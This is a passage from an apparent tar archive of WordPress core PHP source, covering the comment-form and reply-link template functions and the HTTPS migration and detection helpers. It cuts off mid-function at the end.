* @param int|WP_Post $post Optional. Post ID or WP_Post object the comment is going to be displayed on.
* Default current post.
*/
function post_reply_link( $args = array(), $post = null ) {
echo get_post_reply_link( $args, $post );
}
/**
* Retrieves HTML content for cancel comment reply link.
*
* @since 2.7.0
* @since 6.2.0 Added the `$post` parameter.
*
* @param string $link_text Optional. Text to display for cancel reply link. If empty,
* defaults to 'Click here to cancel reply'. Default empty.
* @param int|WP_Post|null $post Optional. The post the comment thread is being
* displayed for. Defaults to the current global post.
* @return string
*/
function get_cancel_comment_reply_link( $link_text = '', $post = null ) {
if ( empty( $link_text ) ) {
$link_text = __( 'Click here to cancel reply.' );
}
$post = get_post( $post );
$reply_to_id = $post ? _get_comment_reply_id( $post->ID ) : 0;
$link_style = 0 !== $reply_to_id ? '' : ' style="display:none;"';
$link_url = esc_url( remove_query_arg( array( 'replytocom', 'unapproved', 'moderation-hash' ) ) ) . '#respond';
$cancel_comment_reply_link = sprintf(
'<a rel="nofollow" id="cancel-comment-reply-link" href="%1$s"%2$s>%3$s</a>',
$link_url,
$link_style,
$link_text
);
/**
* Filters the cancel comment reply link HTML.
*
* @since 2.7.0
*
* @param string $cancel_comment_reply_link The HTML-formatted cancel comment reply link.
* @param string $link_url Cancel comment reply link URL.
* @param string $link_text Cancel comment reply link text.
*/
return apply_filters( 'cancel_comment_reply_link', $cancel_comment_reply_link, $link_url, $link_text );
}
/**
* Displays HTML content for cancel comment reply link.
*
* @since 2.7.0
*
* @param string $link_text Optional. Text to display for cancel reply link. If empty,
* defaults to 'Click here to cancel reply'. Default empty.
*/
function cancel_comment_reply_link( $link_text = '' ) {
echo get_cancel_comment_reply_link( $link_text );
}
/**
* Retrieves hidden input HTML for replying to comments.
*
* @since 3.0.0
* @since 6.2.0 Renamed `$post_id` to `$post` and added WP_Post support.
*
* @param int|WP_Post|null $post Optional. The post the comment is being displayed for.
* Defaults to the current global post.
* @return string Hidden input HTML for replying to comments.
*/
function get_comment_id_fields( $post = null ) {
$post = get_post( $post );
if ( ! $post ) {
return '';
}
$post_id = $post->ID;
$reply_to_id = _get_comment_reply_id( $post_id );
$comment_id_fields = "<input type='hidden' name='comment_post_ID' value='$post_id' id='comment_post_ID' />\n";
$comment_id_fields .= "<input type='hidden' name='comment_parent' id='comment_parent' value='$reply_to_id' />\n";
/**
* Filters the returned comment ID fields.
*
* @since 3.0.0
*
* @param string $comment_id_fields The HTML-formatted hidden ID field comment elements.
* @param int $post_id The post ID.
* @param int $reply_to_id The ID of the comment being replied to.
*/
return apply_filters( 'comment_id_fields', $comment_id_fields, $post_id, $reply_to_id );
}
/**
* Outputs hidden input HTML for replying to comments.
*
* Adds two hidden inputs to the comment form to identify the `comment_post_ID`
* and `comment_parent` values for threaded comments.
*
* This tag must be within the `<form>` section of the `comments.php` template.
*
* @since 2.7.0
* @since 6.2.0 Renamed `$post_id` to `$post` and added WP_Post support.
*
* @see get_comment_id_fields()
*
* @param int|WP_Post|null $post Optional. The post the comment is being displayed for.
* Defaults to the current global post.
*/
function comment_id_fields( $post = null ) {
echo get_comment_id_fields( $post );
}
/**
* Displays text based on comment reply status.
*
* Only affects users with JavaScript disabled.
*
* {@internal The $comment global must be present to allow template tags access to the current
* comment. See https://core.trac.wordpress.org/changeset/36512.}
*
* @since 2.7.0
* @since 6.2.0 Added the `$post` parameter.
*
* @global WP_Comment $comment Global comment object.
*
* @param string|false $no_reply_text Optional. Text to display when not replying to a comment.
* Default false.
* @param string|false $reply_text Optional. Text to display when replying to a comment.
* Default false. Accepts "%s" for the author of the comment
* being replied to.
* @param bool $link_to_parent Optional. Boolean to control making the author's name a link
* to their comment. Default true.
* @param int|WP_Post|null $post Optional. The post that the comment form is being displayed for.
* Defaults to the current global post.
*/
function comment_form_title( $no_reply_text = false, $reply_text = false, $link_to_parent = true, $post = null ) {
global $comment;
if ( false === $no_reply_text ) {
$no_reply_text = __( 'Leave a Reply' );
}
if ( false === $reply_text ) {
/* translators: %s: Author of the comment being replied to. */
$reply_text = __( 'Leave a Reply to %s' );
}
$post = get_post( $post );
if ( ! $post ) {
echo $no_reply_text;
return;
}
$reply_to_id = _get_comment_reply_id( $post->ID );
if ( 0 === $reply_to_id ) {
echo $no_reply_text;
return;
}
// Sets the global so that template tags can be used in the comment form.
$comment = get_comment( $reply_to_id );
if ( $link_to_parent ) {
$comment_author = sprintf(
'<a href="#comment-%1$s">%2$s</a>',
get_comment_ID(),
get_comment_author( $reply_to_id )
);
} else {
$comment_author = get_comment_author( $reply_to_id );
}
printf( $reply_text, $comment_author );
}
/**
* Gets the comment's reply to ID from the $_GET['replytocom'].
*
* @since 6.2.0
*
* @access private
*
* @param int|WP_Post $post The post the comment is being displayed for.
* Defaults to the current global post.
* @return int Comment's reply to ID.
*/
function _get_comment_reply_id( $post = null ) {
$post = get_post( $post );
if ( ! $post || ! isset( $_GET['replytocom'] ) || ! is_numeric( $_GET['replytocom'] ) ) {
return 0;
}
$reply_to_id = (int) $_GET['replytocom'];
/*
* Validate the comment.
* Bail out if it does not exist, is not approved, or its
* `comment_post_ID` does not match the given post ID.
*/
$comment = get_comment( $reply_to_id );
if (
! $comment instanceof WP_Comment ||
0 === (int) $comment->comment_approved ||
$post->ID !== (int) $comment->comment_post_ID
) {
return 0;
}
return $reply_to_id;
}
/**
* Displays a list of comments.
*
* Used in the comments.php template to list comments for a particular post.
*
* @since 2.7.0
*
* @see WP_Query::$comments
*
* @global WP_Query $wp_query WordPress Query object.
* @global int $comment_alt
* @global int $comment_depth
* @global int $comment_thread_alt
* @global bool $overridden_cpage
* @global bool $in_comment_loop
*
* @param string|array $args {
* Optional. Formatting options.
*
* @type object $walker Instance of a Walker class to list comments. Default null.
* @type int $max_depth The maximum comments depth. Default empty.
* @type string $style The style of list ordering. Accepts 'ul', 'ol', or 'div'.
* 'div' will result in no additional list markup. Default 'ul'.
* @type callable $callback Callback function to use. Default null.
* @type callable $end-callback Callback function to use at the end. Default null.
* @type string $type Type of comments to list. Accepts 'all', 'comment',
* 'pingback', 'trackback', 'pings'. Default 'all'.
* @type int $page Page ID to list comments for. Default empty.
* @type int $per_page Number of comments to list per page. Default empty.
* @type int $avatar_size Height and width dimensions of the avatar size. Default 32.
* @type bool $reverse_top_level Ordering of the listed comments. If true, will display
* newest comments first. Default null.
* @type bool $reverse_children Whether to reverse child comments in the list. Default null.
* @type string $format How to format the comments list. Accepts 'html5', 'xhtml'.
* Default 'html5' if the theme supports it.
* @type bool $short_ping Whether to output short pings. Default false.
* @type bool $echo Whether to echo the output or return it. Default true.
* }
* @param WP_Comment[] $comments Optional. Array of WP_Comment objects. Default null.
* @return void|string Void if 'echo' argument is true, or no comments to list.
* Otherwise, HTML list of comments.
*/
function wp_list_comments( $args = array(), $comments = null ) {
global $wp_query, $comment_alt, $comment_depth, $comment_thread_alt, $overridden_cpage, $in_comment_loop;
$in_comment_loop = true;
$comment_alt = 0;
$comment_thread_alt = 0;
$comment_depth = 1;
$defaults = array(
'walker' => null,
'max_depth' => '',
'style' => 'ul',
'callback' => null,
'end-callback' => null,
'type' => 'all',
'page' => '',
'per_page' => '',
'avatar_size' => 32,
'reverse_top_level' => null,
'reverse_children' => '',
'format' => current_theme_supports( 'html5', 'comment-list' ) ? 'html5' : 'xhtml',
'short_ping' => false,
'echo' => true,
);
$parsed_args = wp_parse_args( $args, $defaults );
/**
* Filters the arguments used in retrieving the comment list.
*
* @since 4.0.0
*
* @see wp_list_comments()
*
* @param array $parsed_args An array of arguments for displaying comments.
*/
$parsed_args = apply_filters( 'wp_list_comments_args', $parsed_args );
// Figure out what comments we'll be looping through ($_comments).
if ( null !== $comments ) {
$comments = (array) $comments;
if ( empty( $comments ) ) {
return;
}
if ( 'all' !== $parsed_args['type'] ) {
$comments_by_type = separate_comments( $comments );
if ( empty( $comments_by_type[ $parsed_args['type'] ] ) ) {
return;
}
$_comments = $comments_by_type[ $parsed_args['type'] ];
} else {
$_comments = $comments;
}
} else {
/*
* If 'page' or 'per_page' has been passed, and does not match what's in $wp_query,
* perform a separate comment query and allow Walker_Comment to paginate.
*/
if ( $parsed_args['page'] || $parsed_args['per_page'] ) {
$current_cpage = (int) get_query_var( 'cpage' );
if ( ! $current_cpage ) {
$current_cpage = 'newest' === get_option( 'default_comments_page' ) ? 1 : $wp_query->max_num_comment_pages;
}
$current_per_page = (int) get_query_var( 'comments_per_page' );
if ( (int) $parsed_args['page'] !== $current_cpage || (int) $parsed_args['per_page'] !== $current_per_page ) {
$comment_args = array(
'post_id' => get_the_ID(),
'orderby' => 'comment_date_gmt',
'order' => 'ASC',
'status' => 'approve',
);
if ( is_user_logged_in() ) {
$comment_args['include_unapproved'] = array( get_current_user_id() );
} else {
$unapproved_email = wp_get_unapproved_comment_author_email();
if ( $unapproved_email ) {
$comment_args['include_unapproved'] = array( $unapproved_email );
}
}
$comments = get_comments( $comment_args );
if ( 'all' !== $parsed_args['type'] ) {
$comments_by_type = separate_comments( $comments );
if ( empty( $comments_by_type[ $parsed_args['type'] ] ) ) {
return;
}
$_comments = $comments_by_type[ $parsed_args['type'] ];
} else {
$_comments = $comments;
}
}
// Otherwise, fall back on the comments from `$wp_query->comments`.
} else {
if ( empty( $wp_query->comments ) ) {
return;
}
if ( 'all' !== $parsed_args['type'] ) {
if ( empty( $wp_query->comments_by_type ) ) {
$wp_query->comments_by_type = separate_comments( $wp_query->comments );
}
if ( empty( $wp_query->comments_by_type[ $parsed_args['type'] ] ) ) {
return;
}
$_comments = $wp_query->comments_by_type[ $parsed_args['type'] ];
} else {
$_comments = $wp_query->comments;
}
if ( $wp_query->max_num_comment_pages ) {
$default_comments_page = get_option( 'default_comments_page' );
$cpage = (int) get_query_var( 'cpage' );
if ( 'newest' === $default_comments_page ) {
$parsed_args['cpage'] = $cpage;
} elseif ( 1 === $cpage ) {
/*
* When the first page shows the oldest comments,
* post permalink is the same as the comment permalink.
*/
$parsed_args['cpage'] = '';
} else {
$parsed_args['cpage'] = $cpage;
}
$parsed_args['page'] = 0;
$parsed_args['per_page'] = 0;
}
}
}
if ( '' === $parsed_args['per_page'] && get_option( 'page_comments' ) ) {
$parsed_args['per_page'] = get_query_var( 'comments_per_page' );
}
if ( empty( $parsed_args['per_page'] ) ) {
$parsed_args['per_page'] = 0;
$parsed_args['page'] = 0;
}
if ( '' === $parsed_args['max_depth'] ) {
if ( get_option( 'thread_comments' ) ) {
$parsed_args['max_depth'] = get_option( 'thread_comments_depth' );
} else {
$parsed_args['max_depth'] = -1;
}
}
if ( '' === $parsed_args['page'] ) {
if ( empty( $overridden_cpage ) ) {
$parsed_args['page'] = get_query_var( 'cpage' );
} else {
$threaded = ( -1 !== (int) $parsed_args['max_depth'] );
$parsed_args['page'] = ( 'newest' === get_option( 'default_comments_page' ) ) ? get_comment_pages_count( $_comments, $parsed_args['per_page'], $threaded ) : 1;
set_query_var( 'cpage', $parsed_args['page'] );
}
}
// Validation check.
$parsed_args['page'] = (int) $parsed_args['page'];
$parsed_args['per_page'] = (int) $parsed_args['per_page'];
if ( 0 === $parsed_args['page'] && 0 !== $parsed_args['per_page'] ) {
$parsed_args['page'] = 1;
}
if ( null === $parsed_args['reverse_top_level'] ) {
$parsed_args['reverse_top_level'] = ( 'desc' === get_option( 'comment_order' ) );
}
if ( empty( $parsed_args['walker'] ) ) {
$walker = new Walker_Comment();
} else {
$walker = $parsed_args['walker'];
}
$output = $walker->paged_walk( $_comments, $parsed_args['max_depth'], $parsed_args['page'], $parsed_args['per_page'], $parsed_args );
$in_comment_loop = false;
if ( $parsed_args['echo'] ) {
echo $output;
} else {
return $output;
}
}
/**
* Outputs a complete commenting form for use within a template.
*
* Most strings and form fields may be controlled through the `$args` array passed
* into the function, while you may also choose to use the {@see 'comment_form_default_fields'}
* filter to modify the array of default fields if you'd just like to add a new
* one or remove a single field. All fields are also individually passed through
* a filter of the {@see 'comment_form_field_$name'} where `$name` is the key used
* in the array of fields.
*
* @since 3.0.0
* @since 4.1.0 Introduced the 'class_submit' argument.
* @since 4.2.0 Introduced the 'submit_button' and 'submit_fields' arguments.
* @since 4.4.0 Introduced the 'class_form', 'title_reply_before', 'title_reply_after',
* 'cancel_reply_before', and 'cancel_reply_after' arguments.
* @since 4.5.0 The 'author', 'email', and 'url' form fields are limited to 245, 100,
* and 200 characters, respectively.
* @since 4.6.0 Introduced the 'action' argument.
* @since 4.9.6 Introduced the 'cookies' default comment field.
* @since 5.5.0 Introduced the 'class_container' argument.
* @since 6.8.2 Introduced the 'novalidate' argument.
*
* @param array $args {
* Optional. Default arguments and form fields to override.
*
* @type array $fields {
* Default comment fields, filterable by default via the {@see 'comment_form_default_fields'} hook.
*
* @type string $author Comment author field HTML.
* @type string $email Comment author email field HTML.
* @type string $url Comment author URL field HTML.
* @type string $cookies Comment cookie opt-in field HTML.
* }
* @type string $comment_field The comment textarea field HTML.
* @type string $must_log_in HTML element for a 'must be logged in to comment' message.
* @type string $logged_in_as The HTML for the 'logged in as [user]' message, the Edit profile link,
* and the Log out link.
* @type string $comment_notes_before HTML element for a message displayed before the comment fields
* if the user is not logged in.
* Default 'Your email address will not be published.'.
* @type string $comment_notes_after HTML element for a message displayed after the textarea field.
* @type string $action The comment form element action attribute. Default '/wp-comments-post.php'.
* @type bool $novalidate Whether the novalidate attribute is added to the comment form. Default false.
* @type string $id_form The comment form element id attribute. Default 'commentform'.
* @type string $id_submit The comment submit element id attribute. Default 'submit'.
* @type string $class_container The comment form container class attribute. Default 'comment-respond'.
* @type string $class_form The comment form element class attribute. Default 'comment-form'.
* @type string $class_submit The comment submit element class attribute. Default 'submit'.
* @type string $name_submit The comment submit element name attribute. Default 'submit'.
* @type string $title_reply The translatable 'reply' button label. Default 'Leave a Reply'.
* @type string $title_reply_to The translatable 'reply-to' button label. Default 'Leave a Reply to %s',
* where %s is the author of the comment being replied to.
* @type string $title_reply_before HTML displayed before the comment form title.
* Default: '<h3 id="reply-title" class="comment-reply-title">'.
* @type string $title_reply_after HTML displayed after the comment form title.
* Default: '</h3>'.
* @type string $cancel_reply_before HTML displayed before the cancel reply link.
* @type string $cancel_reply_after HTML displayed after the cancel reply link.
* @type string $cancel_reply_link The translatable 'cancel reply' button label. Default 'Cancel reply'.
* @type string $label_submit The translatable 'submit' button label. Default 'Post a comment'.
* @type string $submit_button HTML format for the Submit button.
* Default: '<input name="%1$s" type="submit" id="%2$s" class="%3$s" value="%4$s" />'.
* @type string $submit_field HTML format for the markup surrounding the Submit button and comment hidden
* fields. Default: '<p class="form-submit">%1$s %2$s</p>', where %1$s is the
* submit button markup and %2$s is the comment hidden fields.
* @type string $format The comment form format. Default 'xhtml'. Accepts 'xhtml', 'html5'.
* }
* @param int|WP_Post $post Optional. Post ID or WP_Post object to generate the form for. Default current post.
*/
function comment_form( $args = array(), $post = null ) {
$post = get_post( $post );
// Exit the function if the post is invalid or comments are closed.
if ( ! $post || ! comments_open( $post ) ) {
/**
* Fires after the comment form if comments are closed.
*
* For backward compatibility, this action also fires if comment_form()
* is called with an invalid post object or ID.
*
* @since 3.0.0
*/
do_action( 'comment_form_comments_closed' );
return;
}
$post_id = $post->ID;
$commenter = wp_get_current_commenter();
$user = wp_get_current_user();
$user_identity = $user->exists() ? $user->display_name : '';
$args = wp_parse_args( $args );
if ( ! isset( $args['format'] ) ) {
$args['format'] = current_theme_supports( 'html5', 'comment-form' ) ? 'html5' : 'xhtml';
}
$req = get_option( 'require_name_email' );
$html5 = 'html5' === $args['format'];
// Define attributes in HTML5 or XHTML syntax.
$required_attribute = ( $html5 ? ' required' : ' required="required"' );
$checked_attribute = ( $html5 ? ' checked' : ' checked="checked"' );
// Identify required fields visually and create a message about the indicator.
$required_indicator = ' ' . wp_required_field_indicator();
$required_text = ' ' . wp_required_field_message();
$fields = array(
'author' => sprintf(
'<p class="comment-form-author">%s %s</p>',
sprintf(
'<label for="author">%s%s</label>',
__( 'Name' ),
( $req ? $required_indicator : '' )
),
sprintf(
'<input id="author" name="author" type="text" value="%s" size="30" maxlength="245" autocomplete="name"%s />',
esc_attr( $commenter['comment_author'] ),
( $req ? $required_attribute : '' )
)
),
'email' => sprintf(
'<p class="comment-form-email">%s %s</p>',
sprintf(
'<label for="email">%s%s</label>',
__( 'Email' ),
( $req ? $required_indicator : '' )
),
sprintf(
'<input id="email" name="email" %s value="%s" size="30" maxlength="100" aria-describedby="email-notes" autocomplete="email"%s />',
( $html5 ? 'type="email"' : 'type="text"' ),
esc_attr( $commenter['comment_author_email'] ),
( $req ? $required_attribute : '' )
)
),
'url' => sprintf(
'<p class="comment-form-url">%s %s</p>',
sprintf(
'<label for="url">%s</label>',
__( 'Website' )
),
sprintf(
'<input id="url" name="url" %s value="%s" size="30" maxlength="200" autocomplete="url" />',
( $html5 ? 'type="url"' : 'type="text"' ),
esc_attr( $commenter['comment_author_url'] )
)
),
);
if ( has_action( 'set_comment_cookies', 'wp_set_comment_cookies' ) && get_option( 'show_comments_cookies_opt_in' ) ) {
$consent = empty( $commenter['comment_author_email'] ) ? '' : $checked_attribute;
$fields['cookies'] = sprintf(
'<p class="comment-form-cookies-consent">%s %s</p>',
sprintf(
'<input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes"%s />',
$consent
),
sprintf(
'<label for="wp-comment-cookies-consent">%s</label>',
__( 'Save my name, email, and website in this browser for the next time I comment.' )
)
);
// Ensure that the passed fields include cookies consent.
if ( isset( $args['fields'] ) && ! isset( $args['fields']['cookies'] ) ) {
$args['fields']['cookies'] = $fields['cookies'];
}
}
$original_fields = $fields;
/**
* Filters the default comment form fields.
*
* @since 3.0.0
*
* @param string[] $fields Array of the default comment fields.
*/
$fields = apply_filters( 'comment_form_default_fields', $fields );
$defaults = array(
'fields' => $fields,
'comment_field' => sprintf(
'<p class="comment-form-comment">%s %s</p>',
sprintf(
'<label for="comment">%s%s</label>',
_x( 'Comment', 'noun' ),
$required_indicator
),
'<textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525"' . $required_attribute . '></textarea>'
),
'must_log_in' => sprintf(
'<p class="must-log-in">%s</p>',
sprintf(
/* translators: %s: Login URL. */
__( 'You must be <a href="%s">logged in</a> to post a comment.' ),
/** This filter is documented in wp-includes/link-template.php */
wp_login_url( apply_filters( 'the_permalink', get_permalink( $post_id ), $post_id ) )
)
),
'logged_in_as' => sprintf(
'<p class="logged-in-as">%s%s</p>',
sprintf(
/* translators: 1: User name, 2: Edit user link, 3: Logout URL. */
__( 'Logged in as %1$s. <a href="%2$s">Edit your profile</a>. <a href="%3$s">Log out?</a>' ),
$user_identity,
get_edit_user_link(),
/** This filter is documented in wp-includes/link-template.php */
wp_logout_url( apply_filters( 'the_permalink', get_permalink( $post_id ), $post_id ) )
),
$required_text
),
'comment_notes_before' => sprintf(
'<p class="comment-notes">%s%s</p>',
sprintf(
'<span id="email-notes">%s</span>',
__( 'Your email address will not be published.' )
),
$required_text
),
'comment_notes_after' => '',
'action' => site_url( '/wp-comments-post.php' ),
'novalidate' => false,
'id_form' => 'commentform',
'id_submit' => 'submit',
'class_container' => 'comment-respond',
'class_form' => 'comment-form',
'class_submit' => 'submit',
'name_submit' => 'submit',
'title_reply' => __( 'Leave a Reply' ),
/* translators: %s: Author of the comment being replied to. */
'title_reply_to' => __( 'Leave a Reply to %s' ),
'title_reply_before' => '<h3 id="reply-title" class="comment-reply-title">',
'title_reply_after' => '</h3>',
'cancel_reply_before' => ' <small>',
'cancel_reply_after' => '</small>',
'cancel_reply_link' => __( 'Cancel reply' ),
'label_submit' => __( 'Post Comment' ),
'submit_button' => '<input name="%1$s" type="submit" id="%2$s" class="%3$s" value="%4$s" />',
'submit_field' => '<p class="form-submit">%1$s %2$s</p>',
'format' => 'xhtml',
);
/**
* Filters the comment form default arguments.
*
* Use {@see 'comment_form_default_fields'} to filter the comment fields.
*
* @since 3.0.0
*
* @param array $defaults The default comment form arguments.
*/
$args = wp_parse_args( $args, apply_filters( 'comment_form_defaults', $defaults ) );
// Ensure that the filtered arguments contain all required default values.
$args = array_merge( $defaults, $args );
// Remove `aria-describedby` from the email field if there's no associated description.
if ( isset( $args['fields']['email'] ) && ! str_contains( $args['comment_notes_before'], 'id="email-notes"' ) ) {
$args['fields']['email'] = str_replace(
' aria-describedby="email-notes"',
'',
$args['fields']['email']
);
}
/**
* Fires before the comment form.
*
* @since 3.0.0
*/
do_action( 'comment_form_before' );
?>
<div id="respond" class="<?php echo esc_attr( $args['class_container'] ); ?>">
<?php
echo $args['title_reply_before'];
comment_form_title( $args['title_reply'], $args['title_reply_to'], true, $post_id );
if ( get_option( 'thread_comments' ) ) {
echo $args['cancel_reply_before'];
cancel_comment_reply_link( $args['cancel_reply_link'] );
echo $args['cancel_reply_after'];
}
echo $args['title_reply_after'];
if ( get_option( 'comment_registration' ) && ! is_user_logged_in() ) :
echo $args['must_log_in'];
/**
* Fires after the HTML-formatted 'must log in after' message in the comment form.
*
* @since 3.0.0
*/
do_action( 'comment_form_must_log_in_after' );
else :
printf(
'<form action="%s" method="post" id="%s" class="%s"%s>',
esc_url( $args['action'] ),
esc_attr( $args['id_form'] ),
esc_attr( $args['class_form'] ),
( $args['novalidate'] ? ' novalidate' : '' )
);
/**
* Fires at the top of the comment form, inside the form tag.
*
* @since 3.0.0
*/
do_action( 'comment_form_top' );
if ( is_user_logged_in() ) :
/**
* Filters the 'logged in' message for the comment form for display.
*
* @since 3.0.0
*
* @param string $args_logged_in The HTML for the 'logged in as [user]' message,
* the Edit profile link, and the Log out link.
* @param array $commenter An array containing the comment author's
* username, email, and URL.
* @param string $user_identity If the commenter is a registered user,
* the display name, blank otherwise.
*/
echo apply_filters( 'comment_form_logged_in', $args['logged_in_as'], $commenter, $user_identity );
/**
* Fires after the is_user_logged_in() check in the comment form.
*
* @since 3.0.0
*
* @param array $commenter An array containing the comment author's
* username, email, and URL.
* @param string $user_identity If the commenter is a registered user,
* the display name, blank otherwise.
*/
do_action( 'comment_form_logged_in_after', $commenter, $user_identity );
else :
echo $args['comment_notes_before'];
endif;
// Prepare an array of all fields, including the textarea.
$comment_fields = array( 'comment' => $args['comment_field'] ) + (array) $args['fields'];
/**
* Filters the comment form fields, including the textarea.
*
* @since 4.4.0
*
* @param array $comment_fields The comment fields.
*/
$comment_fields = apply_filters( 'comment_form_fields', $comment_fields );
// Get an array of field names, excluding the textarea.
$comment_field_keys = array_diff( array_keys( $comment_fields ), array( 'comment' ) );
// Get the first and the last field name, excluding the textarea.
$first_field = reset( $comment_field_keys );
$last_field = end( $comment_field_keys );
foreach ( $comment_fields as $name => $field ) {
if ( 'comment' === $name ) {
/**
* Filters the content of the comment textarea field for display.
*
* @since 3.0.0
*
* @param string $args_comment_field The content of the comment textarea field.
*/
echo apply_filters( 'comment_form_field_comment', $field );
echo $args['comment_notes_after'];
} elseif ( ! is_user_logged_in() || ! isset( $original_fields[ $name ] ) ) {
if ( $first_field === $name ) {
/**
* Fires before the comment fields in the comment form, excluding the textarea.
*
* @since 3.0.0
*/
do_action( 'comment_form_before_fields' );
}
/**
* Filters a comment form field for display.
*
* The dynamic portion of the hook name, `$name`, refers to the name
* of the comment form field.
*
* Possible hook names include:
*
* - `comment_form_field_comment`
* - `comment_form_field_author`
* - `comment_form_field_email`
* - `comment_form_field_url`
* - `comment_form_field_cookies`
*
* @since 3.0.0
*
* @param string $field The HTML-formatted output of the comment form field.
*/
echo apply_filters( "comment_form_field_{$name}", $field ) . "\n";
if ( $last_field === $name ) {
/**
* Fires after the comment fields in the comment form, excluding the textarea.
*
* @since 3.0.0
*/
do_action( 'comment_form_after_fields' );
}
}
}
$submit_button = sprintf(
$args['submit_button'],
esc_attr( $args['name_submit'] ),
esc_attr( $args['id_submit'] ),
esc_attr( $args['class_submit'] ),
esc_attr( $args['label_submit'] )
);
/**
* Filters the submit button for the comment form to display.
*
* @since 4.2.0
*
* @param string $submit_button HTML markup for the submit button.
* @param array $args Arguments passed to comment_form().
*/
$submit_button = apply_filters( 'comment_form_submit_button', $submit_button, $args );
$submit_field = sprintf(
$args['submit_field'],
$submit_button,
get_comment_id_fields( $post_id )
);
/**
* Filters the submit field for the comment form to display.
*
* The submit field includes the submit button, hidden fields for the
* comment form, and any wrapper markup.
*
* @since 4.2.0
*
* @param string $submit_field HTML markup for the submit field.
* @param array $args Arguments passed to comment_form().
*/
echo apply_filters( 'comment_form_submit_field', $submit_field, $args );
/**
* Fires at the bottom of the comment form, inside the closing form tag.
*
* @since 1.5.0
*
* @param int $post_id The post ID.
*/
do_action( 'comment_form', $post_id );
echo '</form>';
endif;
?>
</div><!-- #respond -->
<?php
/**
* Fires after the comment form.
*
* @since 3.0.0
*/
do_action( 'comment_form_after' );
}
https-migration-20260606074445-20260621081103.php 0000666 00000011205 15224151220 0013353 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605094635.php 0000666 00000013341 15224151220 0011770 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
